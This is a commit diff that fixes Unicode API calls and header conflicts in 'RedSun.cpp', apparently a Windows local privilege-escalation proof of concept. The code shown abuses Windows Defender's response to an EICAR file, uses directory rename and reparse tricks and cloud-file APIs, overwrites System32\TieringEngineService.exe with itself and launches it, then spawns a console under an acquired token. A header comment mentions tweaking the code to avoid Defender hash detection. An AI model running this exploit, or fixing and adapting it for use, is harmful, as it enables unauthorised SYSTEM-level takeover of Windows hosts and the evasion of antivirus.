Fix Windows Unicode API usage and ntstatus header conflicts

RedSun.cpp

@@ -5,13 +5,15 @@
 // Windows Defender from picking up on it just because of its
 // hash.
 
-#define _CRT_SECURE_NO_WARNINGS
-#include <iostream>
-#include <Windows.h>
-#include <conio.h>
-#include <winternl.h>
-#include <ntstatus.h>
-#include <cfapi.h>
+#define _CRT_SECURE_NO_WARNINGS
+#define WIN32_NO_STATUS
+#include <iostream>
+#include <Windows.h>
+#undef WIN32_NO_STATUS
+#include <conio.h>
+#include <winternl.h>
+#include <ntstatus.h>
+#include <cfapi.h>
 
 #pragma comment(lib,"synchronization.lib")
 #pragma comment(lib,"sas.lib")
@@ -73,8 +75,8 @@ typedef struct _REPARSE_DATA_BUFFER {
 
 
 
-HMODULE h = LoadLibrary(L"ntdll.dll");
-HMODULE hm = GetModuleHandle(L"ntdll.dll");
+HMODULE h = LoadLibraryW(L"ntdll.dll");
+HMODULE hm = GetModuleHandleW(L"ntdll.dll");
 NTSTATUS(WINAPI* _NtOpenDirectoryObject)(
     PHANDLE            DirectoryHandle,
     ACCESS_MASK        DesiredAccess,
@@ -518,7 +520,7 @@ void DoCloudStuff(wchar_t* syncroot, wchar_t* filename, DWORD filesz = 0x1000)
 void LaunchConsoleInSessionId()
 {
 
-    HANDLE hpipe = CreateFile(L"\\??\\pipe\\REDSUN", GENERIC_READ, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    HANDLE hpipe = CreateFileW(L"\\??\\pipe\\REDSUN", GENERIC_READ, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
     if (hpipe == INVALID_HANDLE_VALUE)
         return;
     DWORD sessionid = 0;
@@ -541,9 +543,9 @@ void LaunchConsoleInSessionId()
         return;
     }
 
-    STARTUPINFO si = { 0 };
+    STARTUPINFOW si = { 0 };
     PROCESS_INFORMATION pi = { 0 };
-    CreateProcessAsUser(hnewtoken, L"C:\\Windows\\System32\\conhost.exe", NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
+    CreateProcessAsUserW(hnewtoken, L"C:\\Windows\\System32\\conhost.exe", NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
 
     CloseHandle(hnewtoken);
 
@@ -591,12 +593,12 @@ void LaunchTierManagementEng()
 
 int main()
 {
-    HANDLE hpipe = CreateNamedPipe(L"\\??\\pipe\\REDSUN", PIPE_ACCESS_DUPLEX | FILE_FLAG_FIRST_PIPE_INSTANCE, NULL, 1, NULL, NULL, NULL,NULL);
+    HANDLE hpipe = CreateNamedPipeW(L"\\??\\pipe\\REDSUN", PIPE_ACCESS_DUPLEX | FILE_FLAG_FIRST_PIPE_INSTANCE, NULL, 1, NULL, NULL, NULL,NULL);
     if (hpipe == INVALID_HANDLE_VALUE)
         return 1;
 
     wchar_t workdir[MAX_PATH] = { 0 };
-    ExpandEnvironmentStrings(L"%TEMP%\\RS-", workdir, MAX_PATH);
+    ExpandEnvironmentStringsW(L"%TEMP%\\RS-", workdir, MAX_PATH);
 
     GUID uid = { 0 };
     wchar_t wuid[100] = { 0 };
@@ -605,17 +607,17 @@ int main()
     wcscat(workdir, wuid);
     wchar_t filename[] = L"TieringEngineService.exe";
     wchar_t foo[MAX_PATH];
-    wsprintf(foo, L"%ws\\%ws", workdir, filename);
+    wsprintfW(foo, L"%ws\\%ws", workdir, filename);
 
     DWORD tid = 0;
     HANDLE hthread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)ShadowCopyFinderThread, foo, NULL, &tid);
 
-    if (!CreateDirectory(workdir, NULL))
+    if (!CreateDirectoryW(workdir, NULL))
     {
         printf("Failed to create workdir");
         return 1;
     }
-    HANDLE hfile = CreateFile(foo, GENERIC_READ | GENERIC_WRITE | DELETE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+    HANDLE hfile = CreateFileW(foo, GENERIC_READ | GENERIC_WRITE | DELETE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
     if (hfile == INVALID_HANDLE_VALUE)
     {
         printf("Failed create spoof work file.\n");
@@ -627,7 +629,7 @@ int main()
     WriteFile(hfile, eicar, sizeof(eicar) - 1, &nwf, NULL);
 
     // trigger AV response
-    CreateFile(foo, GENERIC_READ | FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    CreateFileW(foo, GENERIC_READ | FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
     if (WaitForSingleObject(gevent, 120000) != WAIT_OBJECT_0)
     {
         printf("PoC timed out, is real time protection enabled ?");
@@ -656,9 +658,9 @@ int main()
     InitializeObjectAttributes(&_objattr, &_foo, OBJ_CASE_INSENSITIVE, NULL, NULL);
 
     wchar_t _tmp[MAX_PATH] = { 0 };
-    wsprintf(_tmp, L"\\??\\%s.TMP", workdir);
-    MoveFileEx(workdir,_tmp,MOVEFILE_REPLACE_EXISTING);
-    if (!CreateDirectory(workdir, NULL))
+    wsprintfW(_tmp, L"\\??\\%s.TMP", workdir);
+    MoveFileExW(workdir, _tmp, MOVEFILE_REPLACE_EXISTING);
+    if (!CreateDirectoryW(workdir, NULL))
     {
         printf("Failed to re-create directory.\n");
         return 1;
@@ -689,7 +691,7 @@ int main()
 
     {
         wchar_t _tmp[MAX_PATH] = { 0 };
-        wsprintf(_tmp, L"\\??\\%s.TEMP2", workdir);
+        wsprintfW(_tmp, L"\\??\\%s.TEMP2", workdir);
 
         PFILE_RENAME_INFORMATION pfri = (PFILE_RENAME_INFORMATION)malloc(sizeof(FILE_RENAME_INFORMATION) + (sizeof(wchar_t) * wcslen(_tmp)));
         ZeroMemory(pfri, sizeof(FILE_RENAME_INFORMATION) + (sizeof(wchar_t) * wcslen(_tmp)));
@@ -768,10 +770,10 @@ int main()
 
 
     wchar_t mx[MAX_PATH] = { 0 };
-    GetModuleFileName(GetModuleHandle(NULL), mx, MAX_PATH);
+    GetModuleFileNameW(GetModuleHandleW(NULL), mx, MAX_PATH);
     wchar_t mx2[MAX_PATH] = { 0 };
-    ExpandEnvironmentStrings(L"%WINDIR%\\System32\\TieringEngineService.exe", mx2, MAX_PATH);
-    CopyFile(mx, mx2, FALSE);
+    ExpandEnvironmentStringsW(L"%WINDIR%\\System32\\TieringEngineService.exe", mx2, MAX_PATH);
+    CopyFileW(mx, mx2, FALSE);
     LaunchTierManagementEng();
     Sleep(2000);
     CloseHandle(hpipe);